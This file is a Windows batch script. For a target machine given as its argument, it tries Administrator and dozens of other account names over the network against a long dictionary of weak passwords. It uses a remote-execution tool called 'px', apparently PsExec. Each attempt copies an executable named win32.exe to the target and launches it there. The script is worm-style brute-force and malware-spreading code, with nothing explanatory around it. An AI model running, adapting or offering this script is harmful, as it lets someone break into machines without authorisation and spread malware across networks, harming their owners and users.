@echo off
px \\%1 -u Administrator -p "" -c -f -d win32.exe
px \\%1 -u administrator -p "" -c -f -d win32.exe
px \\%1 -u Administrator -p 123 -c -f -d win32.exe
px \\%1 -u Administrator -p 1234 -c -f -d win32.exe
px \\%1 -u Administrator -p 12345 -c -f -d win32.exe
px \\%1 -u Administrator -p 123456 -c -f -d win32.exe
px \\%1 -u Administrator -p 1234567 -c -f -d win32.exe
px \\%1 -u Administrator -p 12345678 -c -f -d win32.exe
px \\%1 -u Administrator -p 1029384756 -c -f -d win32.exe
px \\%1 -u Administrator -p 2000 -c -f -d win32.exe
px \\%1 -u Administrator -p 2001 -c -f -d win32.exe
px \\%1 -u Administrator -p 2002 -c -f -d win32.exe
px \\%1 -u Administrator -p 2003 -c -f -d win32.exe
px \\%1 -u Administrator -p zzzzzz -c -f -d win32.exe
px \\%1 -u Administrator -p zzzzz -c -f -d win32.exe
px \\%1 -u Administrator -p zzzz -c -f -d win32.exe
px \\%1 -u Administrator -p aaaaaa -c -f -d win32.exe
px \\%1 -u Administrator -p aaaaa -c -f -d win32.exe
px \\%1 -u Administrator -p aaaa -c -f -d win32.exe
px \\%1 -u Administrator -p aaa -c -f -d win32.exe
px \\%1 -u Administrator -p xxxxxx -c -f -d win32.exe
px \\%1 -u Administrator -p xxxxx -c -f -d win32.exe
px \\%1 -u Administrator -p xxxx -c -f -d win32.exe
px \\%1 -u Administrator -p xxx -c -f -d win32.exe
px \\%1 -u Administrator -p pass123 -c -f -d win32.exe
px \\%1 -u Administrator -p blank -c -f -d win32.exe
px \\%1 -u Administrator -p nopass -c -f -d win32.exe
px \\%1 -u Administrator -p squaresoft -c -f -d win32.exe
px \\%1 -u Administrator -p something -c -f -d win32.exe
px \\%1 -u Administrator -p mypass -c -f -d win32.exe
px \\%1 -u Administrator -p login -c -f -d win32.exe
px \\%1 -u Administrator -p access -c -f -d win32.exe
px \\%1 -u Administrator -p success -c -f -d win32.exe
px \\%1 -u Administrator -p special -c -f -d win32.exe
px \\%1 -u Administrator -p ultra -c -f -d win32.exe
px \\%1 -u Administrator -p pass -c -f -d win32.exe
px \\%1 -u Administrator -p enable -c -f -d win32.exe
px \\%1 -u Administrator -p passwd -c -f -d win32.exe
px \\%1 -u Administrator -p password -c -f -d win32.exe
px \\%1 -u Administrator -p tech -c -f -d win32.exe
px \\%1 -u Administrator -p support -c -f -d win32.exe
px \\%1 -u Administrator -p sql -c -f -d win32.exe
px \\%1 -u Administrator -p temp123 -c -f -d win32.exe
px \\%1 -u Administrator -p test123 -c -f -d win32.exe
px \\%1 -u Administrator -p database -c -f -d win32.exe
px \\%1 -u Administrator -p admin -c -f -d win32.exe
px \\%1 -u Administrator -p administrator -c -f -d win32.exe
px \\%1 -u Administrator -p Administrator -c -f -d win32.exe
px \\%1 -u Administrator -p Admin -c -f -d win32.exe
px \\%1 -u Administrator -p internet -c -f -d win32.exe
px \\%1 -u Administrator -p network -c -f -d win32.exe
px \\%1 -u Administrator -p firewall -c -f -d win32.exe
px \\%1 -u Administrator -p edu -c -f -d win32.exe
px \\%1 -u Administrator -p owner -c -f -d win32.exe
px \\%1 -u Administrator -p local -c -f -d win32.exe
px \\%1 -u Administrator -p remote -c -f -d win32.exe
px \\%1 -u Administrator -p lan -c -f -d win32.exe
px \\%1 -u Administrator -p root -c -f -d win32.exe
px \\%1 -u Administrator -p oracle -c -f -d win32.exe
px \\%1 -u Administrator -p sword -c -f -d win32.exe
px \\%1 -u Administrator -p love -c -f -d win32.exe
px \\%1 -u Administrator -p secret -c -f -d win32.exe
px \\%1 -u Administrator -p sex -c -f -d win32.exe
px \\%1 -u Administrator -p god -c -f -d win32.exe
px \\%1 -u Administrator -p beta -c -f -d win32.exe
px \\%1 -u Administrator -p test -c -f -d win32.exe
px \\%1 -u Administrator -p server -c -f -d win32.exe
px \\%1 -u Administrator -p windows -c -f -d win32.exe
px \\%1 -u Administrator -p computer -c -f -d win32.exe
px \\%1 -u Administrator -p internet -c -f -d win32.exe
px \\%1 -u Administrator -p super -c -f -d win32.exe
px \\%1 -u Administrator -p teen -c -f -d win32.exe
px \\%1 -u Administrator -p alpha -c -f -d win32.exe
px \\%1 -u Administrator -p omega -c -f -d win32.exe
px \\%1 -u Administrator -p user -c -f -d win32.exe
px \\%1 -u Administrator -p manager -c -f -d win32.exe
px \\%1 -u Administrator -p router -c -f -d win32.exe
px \\%1 -u Administrator -p security -c -f -d win32.exe
px \\%1 -u Administrator -p dragon -c -f -d win32.exe
px \\%1 -u Administrator -p printer -c -f -d win32.exe
px \\%1 -u Administrator -p one -c -f -d win32.exe
px \\%1 -u Administrator -p two -c -f -d win32.exe
px \\%1 -u Administrator -p three -c -f -d win32.exe
px \\%1 -u Administrator -p four -c -f -d win32.exe
px \\%1 -u Administrator -p five -c -f -d win32.exe
px \\%1 -u Administrator -p six -c -f -d win32.exe
px \\%1 -u Administrator -p seven -c -f -d win32.exe
px \\%1 -u Administrator -p eight -c -f -d win32.exe
px \\%1 -u Administrator -p nine -c -f -d win32.exe
px \\%1 -u Administrator -p ten -c -f -d win32.exe
px \\%1 -u Administrator -p debug -c -f -d win32.exe
px \\%1 -u Administrator -p telnet -c -f -d win32.exe
px \\%1 -u Administrator -p public -c -f -d win32.exe
px \\%1 -u Administrator -p monitor -c -f -d win32.exe
px \\%1 -u Administrator -p private -c -f -d win32.exe
px \\%1 -u Administrator -p priv -c -f -d win32.exe
px \\%1 -u Administrator -p prv -c -f -d win32.exe
px \\%1 -u Administrator -p microsoft -c -f -d win32.exe
px \\%1 -u Administrator -p default -c -f -d win32.exe
px \\%1 -u Administrator -p rock -c -f -d win32.exe
px \\%1 -u Administrator -p rand -c -f -d win32.exe
px \\%1 -u Administrator -p random -c -f -d win32.exe
px \\%1 -u Administrator -p video -c -f -d win32.exe
px \\%1 -u Administrator -p thomas -c -f -d win32.exe
px \\%1 -u Administrator -p trance -c -f -d win32.exe
px \\%1 -u Administrator -p hiphop -c -f -d win32.exe
px \\%1 -u Administrator -p dance -c -f -d win32.exe
px \\%1 -u Administrator -p techno -c -f -d win32.exe
px \\%1 -u Administrator -p punk -c -f -d win32.exe
px \\%1 -u Administrator -p summer -c -f -d win32.exe
px \\%1 -u Administrator -p marijuana -c -f -d win32.exe
px \\%1 -u Administrator -p cannabis -c -f -d win32.exe
px \\%1 -u Administrator -p fast -c -f -d win32.exe
px \\%1 -u Administrator -p corporate -c -f -d win32.exe
px \\%1 -u Administrator -p winxp -c -f -d win32.exe
px \\%1 -u Administrator -p win2000 -c -f -d win32.exe
px \\%1 -u Administrator -p space -c -f -d win32.exe
px \\%1 -u Administrator -p change -c -f -d win32.exe
px \\%1 -u Administrator -p changeme -c -f -d win32.exe
px \\%1 -u Administrator -p room -c -f -d win32.exe
px \\%1 -u Administrator -p network -c -f -d win32.exe
px \\%1 -u Administrator -p real -c -f -d win32.exe
px \\%1 -u Administrator -p backup -c -f -d win32.exe
px \\%1 -u Administrator -p office -c -f -d win32.exe
px \\%1 -u Administrator -p student -c -f -d win32.exe
px \\%1 -u Administrator -p user -c -f -d win32.exe
px \\%1 -u Administrator -p temp -c -f -d win32.exe
px \\%1 -u Administrator -p tmp -c -f -d win32.exe
px \\%1 -u Administrator -p passport -c -f -d win32.exe
px \\%1 -u Administrator -p monster -c -f -d win32.exe
px \\%1 -u Administrator -p speed -c -f -d win32.exe
px \\%1 -u Administrator -p main -c -f -d win32.exe
px \\%1 -u Administrator -p astonia -c -f -d win32.exe
px \\%1 -u Administrator -p test -c -f -d win32.exe
px \\%1 -u Administrator -p enterprise -c -f -d win32.exe
px \\%1 -u Administrator -p uptime -c -f -d win32.exe
px \\%1 -u Administrator -p rose -c -f -d win32.exe
px \\%1 -u Administrator -p filter -c -f -d win32.exe
px \\%1 -u Administrator -p chloe -c -f -d win32.exe
px \\%1 -u Administrator -p emily -c -f -d win32.exe
px \\%1 -u Administrator -p megan -c -f -d win32.exe
px \\%1 -u Administrator -p jessica -c -f -d win32.exe
px \\%1 -u Administrator -p sophie -c -f -d win32.exe
px \\%1 -u Administrator -p lauren -c -f -d win32.exe
px \\%1 -u Administrator -p charlotte -c -f -d win32.exe
px \\%1 -u Administrator -p hannah -c -f -d win32.exe
px \\%1 -u Administrator -p olivia -c -f -d win32.exe
px \\%1 -u Administrator -p lucy -c -f -d win32.exe
px \\%1 -u Administrator -p ellie -c -f -d win32.exe
px \\%1 -u Administrator -p mike -c -f -d win32.exe
px \\%1 -u Administrator -p amy -c -f -d win32.exe
px \\%1 -u Administrator -p katie -c -f -d win32.exe
px \\%1 -u Administrator -p georgia -c -f -d win32.exe
px \\%1 -u Administrator -p rebecca -c -f -d win32.exe
px \\%1 -u Administrator -p jack -c -f -d win32.exe
px \\%1 -u Administrator -p kevin -c -f -d win32.exe
px \\%1 -u Administrator -p joshua -c -f -d win32.exe
px \\%1 -u Administrator -p james -c -f -d win32.exe
px \\%1 -u Administrator -p daniel -c -f -d win32.exe
px \\%1 -u Administrator -p harry -c -f -d win32.exe
px \\%1 -u Administrator -p samuel -c -f -d win32.exe
px \\%1 -u Administrator -p joseph -c -f -d win32.exe
px \\%1 -u Administrator -p matthew -c -f -d win32.exe
px \\%1 -u Administrator -p lewis -c -f -d win32.exe
px \\%1 -u Administrator -p luke -c -f -d win32.exe
px \\%1 -u Administrator -p oliver -c -f -d win32.exe
px \\%1 -u Administrator -p william -c -f -d win32.exe
px \\%1 -u Administrator -p benjamin -c -f -d win32.exe
px \\%1 -u Administrator -p james -c -f -d win32.exe
px \\%1 -u Administrator -p ryan -c -f -d win32.exe
px \\%1 -u Administrator -p scott -c -f -d win32.exe
px \\%1 -u Administrator -p alex -c -f -d win32.exe
px \\%1 -u Administrator -p alexander -c -f -d win32.exe
px \\%1 -u Administrator -p david -c -f -d win32.exe
px \\%1 -u Administrator -p nicole -c -f -d win32.exe
px \\%1 -u Administrator -p anna -c -f -d win32.exe
px \\%1 -u Administrator -p robert -c -f -d win32.exe
px \\%1 -u Administrator -p brandon -c -f -d win32.exe
px \\%1 -u Administrator -p qwerty -c -f -d win32.exe
px \\%1 -u Administrator -p asdf -c -f -d win32.exe
px \\%1 -u Administrator -p zxcv -c -f -d win32.exe
px \\%1 -u Administrator -p asdfzxcv -c -f -d win32.exe
px \\%1 -u Administrator -p matrix -c -f -d win32.exe
px \\%1 -u Administrator -p classified -c -f -d win32.exe
px \\%1 -u Administrator -p day -c -f -d win32.exe
px \\%1 -u Administrator -p jay -c -f -d win32.exe
px \\%1 -u Administrator -p nirvana -c -f -d win32.exe
px \\%1 -u Administrator -p deftones -c -f -d win32.exe
px \\%1 -u Administrator -p weezer -c -f -d win32.exe
px \\%1 -u Administrator -p nelly -c -f -d win32.exe
px \\%1 -u Administrator -p eminem -c -f -d win32.exe
px \\%1 -u Administrator -p 2pac -c -f -d win32.exe
px \\%1 -u Administrator -p thuglife -c -f -d win32.exe
px \\%1 -u Administrator -p fender -c -f -d win32.exe
px \\%1 -u Administrator -p fuck -c -f -d win32.exe
px \\%1 -u Administrator -p fuckyou -c -f -d win32.exe
px \\%1 -u Administrator -p fuckoff -c -f -d win32.exe
px \\%1 -u Administrator -p fux0r -c -f -d win32.exe
px \\%1 -u Administrator -p sux0r -c -f -d win32.exe
px \\%1 -u Administrator -p test0r -c -f -d win32.exe
px \\%1 -u Administrator -p hax0r -c -f -d win32.exe
px \\%1 -u Administrator -p hacker -c -f -d win32.exe
px \\%1 -u Administrator -p elite -c -f -d win32.exe
px \\%1 -u Administrator -p 31337 -c -f -d win32.exe
px \\%1 -u Administrator -p jargon -c -f -d win32.exe
px \\%1 -u Administrator -p techie -c -f -d win32.exe
px \\%1 -u Administrator -p addict -c -f -d win32.exe
px \\%1 -u Administrator -p w00t -c -f -d win32.exe
px \\%1 -u Administrator -p hidden -c -f -d win32.exe
px \\%1 -u Administrator -p testing -c -f -d win32.exe
px \\%1 -u Administrator -p blue -c -f -d win32.exe
px \\%1 -u Administrator -p green -c -f -d win32.exe
px \\%1 -u Administrator -p black -c -f -d win32.exe
px \\%1 -u Administrator -p yellow -c -f -d win32.exe
px \\%1 -u Administrator -p purple -c -f -d win32.exe
px \\%1 -u Administrator -p blah -c -f -d win32.exe
px \\%1 -u Administrator -p simpleton -c -f -d win32.exe
px \\%1 -u Administrator -p 90210 -c -f -d win32.exe
px \\%1 -u Administrator -p satan -c -f -d win32.exe
px \\%1 -u Administrator -p soccer -c -f -d win32.exe
px \\%1 -u Administrator -p marino -c -f -d win32.exe
px \\%1 -u Administrator -p jordan -c -f -d win32.exe
px \\%1 -u admin -p "" -c -f -d win32.exe
px \\%1 -u admin -p "admin" -c -f -d win32.exe
px \\%1 -u System -p "" -c -f -d win32.exe
px \\%1 -u System -p "System" -c -f -d win32.exe
px \\%1 -u Tech -p "" -c -f -d win32.exe
px \\%1 -u Tech -p "Tech" -c -f -d win32.exe
px \\%1 -u root -p "" -c -f -d win32.exe
px \\%1 -u root -p "root" -c -f -d win32.exe
px \\%1 -u office -p "" -c -f -d win32.exe
px \\%1 -u office -p "office" -c -f -d win32.exe
px \\%1 -u Student -p "" -c -f -d win32.exe
px \\%1 -u Student -p "Student" -c -f -d win32.exe
px \\%1 -u Mail -p "" -c -f -d win32.exe
px \\%1 -u Mail -p "Mail" -c -f -d win32.exe
px \\%1 -u Internet -p "" -c -f -d win32.exe
px \\%1 -u Internet -p "Internet" -c -f -d win32.exe
px \\%1 -u Server -p "" -c -f -d win32.exe
px \\%1 -u Server -p "Server" -c -f -d win32.exe
px \\%1 -u Monitor -p "" -c -f -d win32.exe
px \\%1 -u Monitor -p "Monitor" -c -f -d win32.exe
px \\%1 -u Printer -p "" -c -f -d win32.exe
px \\%1 -u Printer -p "Printer" -c -f -d win32.exe
px \\%1 -u Access -p "" -c -f -d win32.exe
px \\%1 -u Access -p "Access" -c -f -d win32.exe
px \\%1 -u Network -p "" -c -f -d win32.exe
px \\%1 -u Network -p "Network" -c -f -d win32.exe
px \\%1 -u Database -p "" -c -f -d win32.exe 
px \\%1 -u Database -p "Database" -c -f -d win32.exe 
px \\%1 -u Manager -p "" -c -f -d win32.exe 
px \\%1 -u Manager -p "Manager" -c -f -d win32.exe 
px \\%1 -u Debug -p "" -c -f -d win32.exe 
px \\%1 -u Debug -p "Debug" -c -f -d win32.exe 
px \\%1 -u Telnet -p "" -c -f -d win32.exe 
px \\%1 -u Telnet -p "Telnet" -c -f -d win32.exe 
px \\%1 -u LAN -p "" -c -f -d win32.exe 
px \\%1 -u LAN -p "LAN" -c -f -d win32.exe 
px \\%1 -u Local -p "" -c -f -d win32.exe 
px \\%1 -u Local -p "Local" -c -f -d win32.exe 
px \\%1 -u Remote -p "" -c -f -d win32.exe 
px \\%1 -u Remote -p "Remote" -c -f -d win32.exe 
px \\%1 -u Security -p "" -c -f -d win32.exe 
px \\%1 -u Security -p "Security" -c -f -d win32.exe 
px \\%1 -u Firewall -p "" -c -f -d win32.exe 
px \\%1 -u Firewall -p "Firewall" -c -f -d win32.exe 
px \\%1 -u Main -p "" -c -f -d win32.exe 
px \\%1 -u Main -p "Main" -c -f -d win32.exe 
px \\%1 -u Backup -p "" -c -f -d win32.exe 
px \\%1 -u Backup -p "Backup" -c -f -d win32.exe 
px \\%1 -u Adam -p "" -c -f -d win32.exe 
px \\%1 -u Alice -p "" -c -f -d win32.exe 
px \\%1 -u Amanda -p "" -c -f -d win32.exe 
px \\%1 -u Anna -p "" -c -f -d win32.exe 
px \\%1 -u Brian -p "" -c -f -d win32.exe 
px \\%1 -u Brent -p "" -c -f -d win32.exe 
px \\%1 -u Bill -p "" -c -f -d win32.exe 
px \\%1 -u Billy -p "" -c -f -d win32.exe 
px \\%1 -u Carol -p "" -c -f -d win32.exe 
px \\%1 -u Carrie -p "" -c -f -d win32.exe 
px \\%1 -u Chris -p "" -c -f -d win32.exe 
px \\%1 -u Chrystal -p "" -c -f -d win32.exe 
px \\%1 -u Crystal -p "" -c -f -d win32.exe 
px \\%1 -u Dan -p "" -c -f -d win32.exe 
px \\%1 -u Danny -p "" -c -f -d win32.exe 
px \\%1 -u Danielle -p "" -c -f -d win32.exe 
px \\%1 -u Eric -p "" -c -f -d win32.exe 
px \\%1 -u Erin -p "" -c -f -d win32.exe 
px \\%1 -u Emily -p "" -c -f -d win32.exe 
px \\%1 -u Frank -p "" -c -f -d win32.exe 
px \\%1 -u George -p "" -c -f -d win32.exe 
px \\%1 -u Hal -p "" -c -f -d win32.exe 
px \\%1 -u Hank -p "" -c -f -d win32.exe 
px \\%1 -u Harold -p "" -c -f -d win32.exe 
px \\%1 -u John -p "" -c -f -d win32.exe 
px \\%1 -u Jay -p "" -c -f -d win32.exe 
px \\%1 -u Janette -p "" -c -f -d win32.exe 
px \\%1 -u Josh -p "" -c -f -d win32.exe 
px \\%1 -u Joshua -p "" -c -f -d win32.exe 
px \\%1 -u Jason -p "" -c -f -d win32.exe 
px \\%1 -u Jimmy -p "" -c -f -d win32.exe 
px \\%1 -u James -p "" -c -f -d win32.exe 
px \\%1 -u Jack -p "" -c -f -d win32.exe 
px \\%1 -u Johnny -p "" -c -f -d win32.exe 
px \\%1 -u Kate -p "" -c -f -d win32.exe 
px \\%1 -u Katie -p "" -c -f -d win32.exe 
px \\%1 -u Kelly -p "" -c -f -d win32.exe 
px \\%1 -u Ken -p "" -c -f -d win32.exe 
px \\%1 -u Kenny -p "" -c -f -d win32.exe 
px \\%1 -u Kyle -p "" -c -f -d win32.exe 
px \\%1 -u Laura -p "" -c -f -d win32.exe 
px \\%1 -u Lisa -p "" -c -f -d win32.exe 
px \\%1 -u Lou -p "" -c -f -d win32.exe 
px \\%1 -u Louie -p "" -c -f -d win32.exe 
px \\%1 -u Max -p "" -c -f -d win32.exe 
px \\%1 -u Mike -p "" -c -f -d win32.exe 
px \\%1 -u Manda -p "" -c -f -d win32.exe 
px \\%1 -u Mel -p "" -c -f -d win32.exe 
px \\%1 -u Melanie -p "" -c -f -d win32.exe 
px \\%1 -u Natalie -p "" -c -f -d win32.exe 
px \\%1 -u Natasha -p "" -c -f -d win32.exe 
px \\%1 -u Nora -p "" -c -f -d win32.exe 
px \\%1 -u Nigel -p "" -c -f -d win32.exe 
px \\%1 -u Ozzy -p "" -c -f -d win32.exe 
px \\%1 -u Patty -p "" -c -f -d win32.exe 
px \\%1 -u Patricia -p "" -c -f -d win32.exe 
px \\%1 -u Pat -p "" -c -f -d win32.exe 
px \\%1 -u Peter -p "" -c -f -d win32.exe 
px \\%1 -u Pete -p "" -c -f -d win32.exe 
px \\%1 -u Quasi -p "" -c -f -d win32.exe 
px \\%1 -u Ray -p "" -c -f -d win32.exe 
px \\%1 -u Raymond -p "" -c -f -d win32.exe 
px \\%1 -u Rick -p "" -c -f -d win32.exe 
px \\%1 -u Ricky -p "" -c -f -d win32.exe 
px \\%1 -u Sarah -p "" -c -f -d win32.exe 
px \\%1 -u Sharon -p "" -c -f -d win32.exe 
px \\%1 -u Sam -p "" -c -f -d win32.exe 
px \\%1 -u Sammy -p "" -c -f -d win32.exe 
px \\%1 -u Samantha -p "" -c -f -d win32.exe 
px \\%1 -u Tyler -p "" -c -f -d win32.exe 
px \\%1 -u Tammy -p "" -c -f -d win32.exe 
px \\%1 -u Tania -p "" -c -f -d win32.exe 
px \\%1 -u Val -p "" -c -f -d win32.exe 
px \\%1 -u Vince -p "" -c -f -d win32.exe 
px \\%1 -u Vinny -p "" -c -f -d win32.exe 
px \\%1 -u Walter -p "" -c -f -d win32.exe 
px \\%1 -u Wayne -p "" -c -f -d win32.exe
px \\%1 -u Guest -p "Guest" -c -f -d win32.exe
px \\%1 -u Guest -p "" -c -f -d win32.exe
px \\%1 -u guest -p "guest" -c -f -d win32.exe
px \\%1 -u guest -p "" -c -f -d win32.exe